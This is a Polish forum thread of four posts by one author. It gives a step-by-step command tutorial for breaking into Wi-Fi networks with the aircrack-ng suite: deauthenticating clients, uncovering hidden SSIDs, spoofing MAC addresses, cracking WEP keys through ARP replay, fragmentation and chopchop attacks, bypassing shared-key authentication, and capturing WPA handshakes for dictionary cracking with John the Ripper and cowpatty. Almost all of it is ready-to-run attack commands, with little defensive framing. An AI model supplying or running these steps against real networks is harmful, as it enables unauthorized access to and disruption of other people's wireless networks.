Pokaż wyniki 1 do 4 z 4

Temat: metody ataku na sieci wifi wep/wpa/wpa2 tkip

  1. #1
    Zarejestrowany
    Jun 2011
    Postów
    23

    Domyślnie metody ataku na sieci wifi wep/wpa/wpa2 tkip

    Bardzo ważną rzeczą przed przystąpieniem do pracy jest ustawienie karty w tryb monitor,
    kanału na którym będzie pracować oraz prędkości.
    Pierwszym krokiem będzie włączenie samej karty, następnie trybu monitor, ustawienie
    kanału i na końcu prędkości.

    1.
    Kod:
    ifconfig [interface] up
    2.
    Kod:
    iwconfig [interface] mode monitor lub airmon-ng start [interface]
    3.
    Kod:
    airmon-ng start [interface] [channel]
    / w tym pkt w "interface" może być różnie albo np. wlan0 bądź tryb monitora czyli mon0. A "channel" to numer kanału na którym pracuje Access Point.

    Teraz ułatwimy sobie pracę tworząc odpowiednie deklaracje w systemie dotyczące adresu
    mac naszej karty sieciowej oraz adresu mac naszego Access Pointa, dzięki temu nie będziemy
    musieli wpisywać za każdym razem długich kombinacji cyfr i liter. Aby tego dokonać należy
    edytować plik /etc/profile i dodać dwa wpisy:

    1.
    Kod:
    declare macap=[mac AP]
    - mac naszego Access Pointa będzie teraz
    wywoływany jako parametr $macap

    2.
    Kod:
    declare mac=[mac]
    - mac naszej karty sieciowej będzie teraz
    wywoływany jako parametr $mac

    ciąg dalszy... w drugim poście

  2. #2
    Zarejestrowany
    Jun 2011
    Postów
    23

    Domyślnie Ciąg dalszy

    Teraz możemy sprawdzić czy to co zrobiliśmy do tej pory działa, aby to sprawdzić należy wpisać:

    1.
    Kod:
    airodump-ng [interface]
    Widzimy, że wszystko pięknie działa . Teraz musimy znaleźć odpowiednią prędkość z jaką nasza karta sieciowa będzie pracować. Zależy to przede wszystkim od mocy samej karty jak i odległości pomiędzy Access Pointem a klientem. Aby sprawdzić jaka prędkość będzie odpowiednia musimy wpisać w w Shellu:

    1.
    Kod:
    aireplay -9 -a $macap -B [interface]
    gdzie:
    1. -9 test wstrzykiwania i jakości
    2. -a bssid czyli mac naszego Access Pointa
    3. $macap adres mac naszego Access Pointa, który jest teraz zmienną
    4. -B aktywuje test dla różnych prędkości połączenia

    Generalnie jest tak, że im bliżej AP jesteśmy tym możemy większych prędkości połączenia używać. Dlatego ustawimy sobie prędkość naszej karty na 54 Mb poleceniem:

    1.
    Kod:
    iwconfig [interface] rate 54M
    Na początku omówiliśmy sobie co to jest i jak działa więc niema sensu do tego wracać.
    Zatem przejdźmy do praktyki. Najpierw wpiszmy polecenie:

    1.
    Kod:
    airodump-ng [interface]
    Spowoduje to uruchomienie programu, który wyświetli nam aktualną listę sieci (zawiera BSSID, ESSID, Kanał, Ilość przesyłanych pakietów (DATA), prędkość, rodzaj zabezpieczenia) bezprzewodowych oraz klientów do nich dołączonych.

    Moja sieć jest ukryta, znam jej adres mac czyli (jakiś mac) Essid widziany na shellu to <length: 0>. Pytanie: jak przyłączyć się do takiej sieci, otóż wiemy, że sieć ta chroniona jest tylko poprzez ukrywanie SSID czyli nazwy sieci, gdy zdobędziemy tą nazwę będziemy mogli się połączyć z Access Pointem i korzystać z jej zasobów . Możemy tego dokonać na kilka sposobów:

    1. Czekamy, aż jakiś klient się dołączy, który zna SSID

    2. „Wykopujemy” klientów już przyłączonych, żeby raz jeszcze dołączyli się do Access Pointa

    Pierwszego punkty nie będę opisywał wystarczy poczekać i już będziemy wiedzieć jaką nazwę ma nasza sieć.

    Drugi punkt polega na tym aby klient już podłączony zażądał ponownie połączenia z Access Pointem. Dzięki temu przechwycimy nazwę SSID

    Najpierw kończymy działanie airodump-ng (Ctrl+c), następnie w nowym shellu ustawiamy ponownie kanał na którym pracuje nasz Access Point kopiujemy mac klienta podłączonego do Access Pointa, pytanie skąd go wziąć, otóż wszystko pokazał nam airodump-ng chodzi nam dokładnie o kolumny BSSID oraz STATION. BSSID będzie pokazywał nam adres mac Access Pointa a Station pokaże nam adres mac klienta podłączonego do danego Access Pointa. Teraz wystarczy tylko wpisać odpowiednią komendę z odpowiednim adresem mac w shellu nr 1:

    1.
    Kod:
    aireplay-ng -0 10 –a $macap –c [mac klienta] [interface]
    gdzie:
    1. -0 znaczy deauthencation czyli “odłączenie” klienta od AP
    2. 10 ilość wysłanych żądań odłączenia
    3. -a adres mac Access Pointa
    4. -c adres mac klienta Access Pointa

    oraz w shellu 2:

    1.
    Kod:
    airodump-ng [interface]
    Kontrola adresów MAC:

    Wcześniej opisaliśmy sobie te zabezpieczenie. Teraz potrafiąc znaleźć nazwę ukrytą SSID bez problemu potrafimy też poznać adresy MAC klientów podłączonych do tej sieci. Aby tego dokonać wystarczy wpisać w Shell znane nam polecenie:

    1.
    Kod:
    airodump-ng [interface]
    Spowoduje to wyświetlenie wszystkich klientów, którzy łączą się z danym Acess Pointem. I tak oto mamy naszego klienta o numerze mac (jakiś mac), kóry jest podłączony do naszego Access Pointa.

    Teraz znając ten adres wystarczy wyłączyć naszą kartę i zmienić jej adres mac. Możliwe to jest za pomocą polecenia:

    1.
    Kod:
    iwconfig [interface] down
    2.
    Kod:
    macchanger –m [mac klienta] [interface]
    3.
    Kod:
    ifconfig [interface] up
    Teraz możemy się cieszyć tym, że Access Point zaakceptuje nasz adres MAC i będzie mogli korzystać z jego zasobów.

    WEP – 64 i 128 bit z podłączonym klientem

    ... ciąg dalszy w następnym poście...

  3. #3
    Zarejestrowany
    Jun 2011
    Postów
    23

    Domyślnie i koniec

    Słabością protokołu WEP jest niewątpliwie wektor inicjalizacyjny (IV) i jego słaba implementacja. Problem "zużywania" IV-sów opisał bardzo dokładnie Walker (2000) w dokumencie "Unsafe at any key size; An analisis of the WEP encapsulation". Możemy w nim przeczytać, że przy stosowaniu 40 bitowego klucza WEP prawdopodobieństwo kolizji, czyli powtórzenia IV wynosi 50% przy zgromadzeniu około 4826 ramek a 99% przy zgromadzeniu 12430 ramek. Tak, więc na kolizję IV nie trzeba długo czekać.
    Naszym zadaniem będzie nazbieranie odpowiedniej ilości pakietów zawierających zmieniające się wektory inicjalizacji (IV'sy) wykorzystywane w WEP w celu złamania klucza.
    Na początku ustawimy sobie tryb monitor oraz kanał na którym pracuje nasz Access Point, następnie sprawdzimy jaka będzie najlepsza prędkość żeby z nim „współpracować”.


    1.
    Kod:
    ifconfig [interface] up
    2.
    Kod:
    iwconfig [interface] mode monitor
    3.
    Kod:
    airmon-ng start [interface] [channel]
    4.
    Kod:
    aireplay-ng -9 –a $macap –e „nazwa” –B [interface] lub aireplay-ng -9 –a $macap –B [interface]
    Teraz musimy uruchomić airodump-ng z tym, że będzie miał więcej parametrów takich jak: zapisanie pakietów do pliku, wybór kanału na którym będzie nasłuchiwał.

    1.
    Kod:
    airodump-ng -c [channel] --bssid $macap -w pakiety [interface]
    Następnie musimy dołączyć się do Access Pointa

    Następnie musimy połączyć się z Access Pointem, robimy to za pomocą polecenia:

    1.
    Kod:
    aireplay-ng -1 0 -e “nazwa” -a $macap –h $mac [interface]
    W kolejnym kroku uruchamiamy aireplay-ng w odpowiednim trybie, który będzie nasłuchiwał żądania ARP a następnie będzie wstrzykiwał je do sieci. Powodem wybrania pakietów ARP jest to iż Access Point będzie ponownie transmitował je oraz generował nowe IV. Naszym zadaniem jest nazbierać pakietów IV jak najwięcej.

    1.
    Kod:
    aireplay-ng -3 -b $macap -h $mac [interface]
    Po “wyłapaniu” ok. 200 000 ~ 300 000 pakietów możemy przystąpić do łamania klucza WEP 64 bitowego, chcąc złamać klucz 128 bitowy należy tylko nazbierać ok. 400 000 ~ 500 000 pakietów.

    1.
    Kod:
    aircrack-ng –n 64 pakiety-01.cap
    Natomiast chcąc złamać klucz WEP 128 bitowy wpiszemy polecenie

    1.
    Kod:
    aircrack-ng –n 128 pakiety-01.cap
    WEP 64 i 128 bez podłączonych klientów

    W poprzedniej metodzie przechwytywaliśmy żądania ARP z sieci, które generowali klienci do niej podłączeni. Co natomiast zrobić gdy nie ma klientów podłączonych poprzez drogę radiową natomiast są klienci podłączeni za pomocą kabla?
    Jak zawsze na samym początku musimy ustawić tryb monitor, kanał na którym będzie pracować karta wifi oraz jej prędkość, wiemy jak to zrobić z wcześniejszych naszych prób.
    Teraz standardowo musimy wykonać fałszywe uwierzytelenienie z Access Pointem

    1.
    Kod:
    aireplay-ng -1 0 -e default -a $macap -h $mac [interface]

    Gdy to już zrobimy posłużymy się atakiem chopchop lub fragmentacji żeby otrzymać plik z PRGA (pseudo random generation algorithm). PRGA nie jest kluczem WEP i nie może być użyty to dekryptacji pakietów. Jednakże może być wykorzystany do stworzenia nowych wstrzykiwań pakietów.
    Aby wykonać atak fragmentacji do uzyskania pliku z PRGA należy wykonać polecenie:

    1.
    Kod:
    aireplay-ng -5 -b $macap -h $mac [interface]
    lub atak chopchop

    1.
    Kod:
    aireplay-ng -4 -b $macap -h $mac [interface]
    W poprzednim kroku otrzymaliśmy PRGA. Nieważne jest, który atak wygenerował PRGA, oba dają taki sam rezultat. PRGA jest przechowywane w pliku z końcówka "xor". Możemy użyć PRGA do generowanie pakietu żądań ARP. Celem tej czynności jest aby Access Point ponownie rozgłaszał wstrzyknięty pakiet ARP. Kiedy ponownie będzie go rozgłaszał, będziemy otrzymywać nowe IVs. Wszystkie te nowe Ivs będziemy używali do złamania klucza WEP.

    Aby wygenerowac pakiet ARP służący do wstrzykiwań należy wpisać polecenie:

    1.
    Kod:
    packetforge-ng -0 -a $macap -h $mac -k 255.255.255.255 -l 255.255.255.255 -y fragment-0530-141645.xor -w arp-request
    Następnie uruchamiamy airodump-ng żeby przechwytywać pakiety:

    Kod:
    airodump-ng -c 11 --bssid $macap -w przechwyt [interface]
    Teraz będziemy wstrzykiwać pakiety poleceniem:

    1.
    Kod:
    aireplay-ng -2 -r arp-request -h $mac [interface]
    Na końcu zostało tylko zebranie pakietów (ok. 20min zbierania) i złamanie klucza

    1.
    Kod:
    aircrack-ng –n 128 przechwyt
    Typ uwierzytelniania  Shared Key – uwierzytelnianie z kluczem

    Polega na tym, że tylko użytkownicy którzy mają taki sam klucz WEP jak Access Point mogą przyłączyć się do niego.

    Bardzo prosto jest obejść to zabezpieczenie. Standardowo musimy uruchomić naszą kartę w trybie monitor i ustawić kanał na którym będzie pracować. Następnie wpisujemy polecenie:

    1.
    Kod:
    airodump-ng –c 12 –w pakiety --bssid $macap [interface]
    Teraz czekamy aż jakiś klient podłączy się do Access Pointa, gdy to już nastąpi airodump-ng poinformuje nas o tym w prawym górnym rogu. Można też rozłączyć klienta już podłączonego, dzięki temu również przechwycimy odpowiedni pakiet.

    1.
    Kod:
    aireplay-ng -0 10 –a $macap –c [mac klienta] [interface]
    Po podłączeniu klienta w katalogu, w którym uruchomiono airodump-ng lub w katalogu do którego zapisywane są przechwytywane pakiety powinien pojawić się plik z rozszerzeniem *.xor. W naszym przypadku ten plik nazywa się pakiety-01-00-0C-41-38-61-6E.xor
    Teraz posiadając ten plik ( w pliku tym znajduję się PRGA - pseudo random generation algorithm). Możemy uwierzytelnić się z Access Pointem za pomocą polecenia:

    1.
    Kod:
    aireplay-ng -1 0 –e „nazwa” –y pakiety-01-00-0C-41-38-61-6E.xor –a $macap –h $mac [interface]
    Łamanie zabezpieczeń typu WPA/WPA2 TKIP

    Jednym z najlepszych zabezpieczeń a jednocześnie bardzo słabym jest WPA/WPA2. Można sprawić, że bardzo trudno będzie złamać hasło, które chroni sieć bezprzewodową natomiast gdy hasło będzie słabe tzn. będzie składało się z niewielu znaków, znaki będą tylko z małej litery i nie będzie cyfr i znaków specjalnych do sieci takiej można się włamać w kilka minut.
    Pierwszą czynnością jaką wykonamy to ustawienie karty bezprzewodowej czyli tryb monitor i kanału nasłuchu

    1.
    Kod:
    iwconfig [interface] mode monitor
    2.
    Kod:
    airmon-ng start [interface] [channel]
    Następnie uruchomimy airodumpa żeby przechwytywał pakiety z sieci.

    1.
    Kod:
    airodump-ng –c 12 –bssid $macap –w psk [interface]

    Teraz musimy “odłączyć” podłączonego klienta żeby Access Point ponownie zażądał uwierzytelnienia od klienta (podczas tej czynności airodump przechwyci „WPA handshake”).

    1.
    Kod:
    aireplay-ng -0 2 –a $macap –c [mac klienta] [interface]
    Gdy uda nam się przechwycić „WPA handshake” zobaczymy to w airodumpie w prawym górnym rogu

    Czasami zdarza się że pomimo iż airodump pokazuje WPA handshake tak nie jest, dlatego musimy ponownie użyć polecenia

    1.
    Kod:
    aireplay-ng -0 2 –a $macap –c [mac] [interface]
    Teraz mając już „WPA handshake” możemy przystąpić do łamania hasła ale wcześniej musimy sobie stworzyć słownik, możemy użyć w tym celu programu John the ripper.

    1.
    Kod:
    aircrack-ng –w password.lst –b $macap psk*.cap
    Użycie łamacza haseł John the riiper oraz cowpatty

    1.
    Kod:
    john --wordlist=password.lst --rules --stdout | cowpatty -s Projekt -f - -r psk*.cap
    Użycie łamacza haseł John the ripper oraz aircrack-ng:

    1.
    Kod:
    john --wordlist=password.lst --rules --stdout | aircrack-ng -e Projekt -w – psk*.cap


    Pozdrawiam Phantom1602

  4. #4
    Zarejestrowany
    Jun 2011
    Postów
    23

    Domyślnie proszę o opinie

    jak wyżej prosze o opinie na temat tego czy komuś się to przydało. Opinie proszę wysyłać na gg: 35770217

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52